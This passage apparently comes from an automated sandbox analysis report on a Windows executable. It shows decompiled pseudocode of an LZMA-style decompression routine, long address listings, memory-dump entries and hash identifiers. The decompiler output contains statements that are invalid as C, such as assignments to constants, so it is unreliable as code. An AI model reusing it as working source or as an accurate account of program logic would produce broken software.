													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                0x00000000
                                                0x00406591
                                                0x00406591
                                                0x00406595
                                                0x004065a2
                                                0x004065ac
                                                0x00000000
                                                0x00406597
                                                0x00406597
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x004065db
                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x004064cb
                                                0x004064ce
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00406843
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x00000000
                                                0x00000000
                                                0x00406891
                                                0x00406895
                                                0x00406a44
                                                0x00406a5a
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6b
                                                0x00406a72
                                                0x00406a76
                                                0x00406a76
                                                0x004068a1
                                                0x004068a8
                                                0x004068b0
                                                0x004068b3
                                                0x004068b6
                                                0x004068b6
                                                0x004068bc
                                                0x004068bc
                                                0x00406058
                                                0x00406058
                                                0x00406058
                                                0x00406061
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00000000
                                                0x00406072
                                                0x00000000
                                                0x00000000
                                                0x0040607b
                                                0x0040607e
                                                0x00406081
                                                0x00406085
                                                0x00000000
                                                0x00000000
                                                0x0040608b
                                                0x0040608e
                                                0x00406090
                                                0x00406091
                                                0x00406094
                                                0x00406096
                                                0x00406097
                                                0x00406099
                                                0x0040609c
                                                0x004060a1
                                                0x004060a6
                                                0x004060af
                                                0x004060c2
                                                0x004060c5
                                                0x004060d1
                                                0x004060f9
                                                0x004060fb
                                                0x00406109
                                                0x00406109
                                                0x0040610d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004060fd
                                                0x004060fd
                                                0x00406100
                                                0x00406101
                                                0x00406101
                                                0x00000000
                                                0x004060fd
                                                0x004060d7
                                                0x004060dc
                                                0x004060dc
                                                0x004060e5
                                                0x004060ed
                                                0x004060f0
                                                0x00000000
                                                0x004060f6
                                                0x004060f6
                                                0x00000000
                                                0x004060f6
                                                0x00000000
                                                0x00406113
                                                0x00406113
                                                0x00406117
                                                0x004069c3
                                                0x00000000
                                                0x004069c3
                                                0x00406120
                                                0x00406130
                                                0x00406133
                                                0x00406136
                                                0x00406136
                                                0x00406136
                                                0x00406139
                                                0x0040613d
                                                0x00000000
                                                0x00000000
                                                0x0040613f
                                                0x00406145
                                                0x0040616f
                                                0x00406175
                                                0x0040617c
                                                0x00000000
                                                0x0040617c
                                                0x0040614b
                                                0x0040614e
                                                0x00406153
                                                0x00406153
                                                0x0040615e
                                                0x00406166
                                                0x00406169
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061ae
                                                0x004061b4
                                                0x004061b7
                                                0x004061c4
                                                0x004061cc
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00000000
                                                0x00406183
                                                0x00406183
                                                0x00406187
                                                0x004069d2
                                                0x00000000
                                                0x004069d2
                                                0x00406193
                                                0x0040619e
                                                0x0040619e
                                                0x0040619e
                                                0x004061a1
                                                0x004061a4
                                                0x004061a7
                                                0x004061ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061d4
                                                0x004061d6
                                                0x004061d9
                                                0x0040624a
                                                0x0040624d
                                                0x00406250
                                                0x00406257
                                                0x00406261
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x004061db
                                                0x004061df
                                                0x004061e2
                                                0x004061e4
                                                0x004061e7
                                                0x004061ea
                                                0x004061ec
                                                0x004061ef
                                                0x004061f1
                                                0x004061f6
                                                0x004061f9
                                                0x004061fc
                                                0x00406200
                                                0x00406207
                                                0x0040620a
                                                0x00406211
                                                0x00406215
                                                0x0040621d
                                                0x0040621d
                                                0x0040621d
                                                0x00406217
                                                0x00406217
                                                0x00406217
                                                0x0040620c
                                                0x0040620c
                                                0x0040620c
                                                0x00406221
                                                0x00406224
                                                0x00406242
                                                0x00406244
                                                0x00000000
                                                0x00406226
                                                0x00406226
                                                0x00406229
                                                0x0040622c
                                                0x0040622f
                                                0x00406231
                                                0x00406231
                                                0x00406231
                                                0x00406234
                                                0x00406237
                                                0x00406239
                                                0x0040623a
                                                0x0040623d
                                                0x00000000
                                                0x0040623d
                                                0x00000000
                                                0x00406473
                                                0x00406477
                                                0x00406495
                                                0x00406498
                                                0x0040649f
                                                0x004064a2
                                                0x004064a5
                                                0x004064a8
                                                0x004064ab
                                                0x004064ae
                                                0x004064b0
                                                0x004064b7
                                                0x004064b8
                                                0x004064ba
                                                0x004064bd
                                                0x004064c0
                                                0x004064c3
                                                0x004064c3
                                                0x004064c8
                                                0x00000000
                                                0x004064c8
                                                0x00406479
                                                0x0040647c
                                                0x0040647f
                                                0x00406489
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x004064dd
                                                0x004064e1
                                                0x00406504
                                                0x00406507
                                                0x0040650a
                                                0x00406514
                                                0x004064e3
                                                0x004064e3
                                                0x004064e6
                                                0x004064e9
                                                0x004064ec
                                                0x004064f9
                                                0x004064fc
                                                0x004064fc
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x00406520
                                                0x00406524
                                                0x00000000
                                                0x00000000
                                                0x0040652a
                                                0x0040652e
                                                0x00000000
                                                0x00000000
                                                0x00406534
                                                0x00406536
                                                0x0040653a
                                                0x0040653a
                                                0x0040653d
                                                0x00406541
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068c2
                                                0x004068bc
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00406582
                                                0x00406582
                                                0x00000000
                                                0x00406582
                                                0x00406803
                                                0x00406a38
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00406a6f
                                                0x00406a6f
                                                0x00000000
                                                0x00406a6f
                                                0x004068bc
                                                0x00406843
                                                0x00406840
                                                0x00000000
                                                0x00406595

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
